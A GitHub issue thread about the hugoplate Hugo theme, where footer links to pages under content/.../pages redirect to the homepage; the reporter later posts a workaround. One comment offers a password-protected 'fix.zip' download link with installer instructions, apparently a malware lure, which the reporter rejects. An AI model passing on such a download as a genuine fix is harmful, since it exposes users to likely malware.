### ISSUE TITLE
content/.../pages links not available in footer (running hugo server)

### ISSUE THREAD

**Issue by psclplg** [zeon-studio/hugoplate#145]
### What is your Hugo Extended Version

hugo v0.133.0+extended

### What is your Go Version

 go1.23.

### What is your Node.js Version

v22.7.0

### Check for Existing Issues

- [X] I have searched and found no relevant issues.

### Expected Behavior

The links created for content/.../pages sites will be created and referenced by the code in the themes/hugoplate/layouts/partials/essentials/footer.html.

### Steps to Reproduce

Take the code from the repository and run hugo server command.
Click the links in the footer and you are being directed to the homepage instead of the desired page. 

### Additional Information

The links actually are created but the code in the footer is unable to reference the links. 
Links to other sites (not stored under content/.../pages) are working fine.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by psclplg** [comment]
Definitively not going to download this!

**Comment by psclplg** [comment]
> Download 
> 
> https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
> 
> password: changeme
> 
> In the installer menu, select "gcc."

Definitively not going to download this malware!

**Comment by psclplg** [comment]
Problem can be solved by moving files from pages folder up to the language specific content folder.
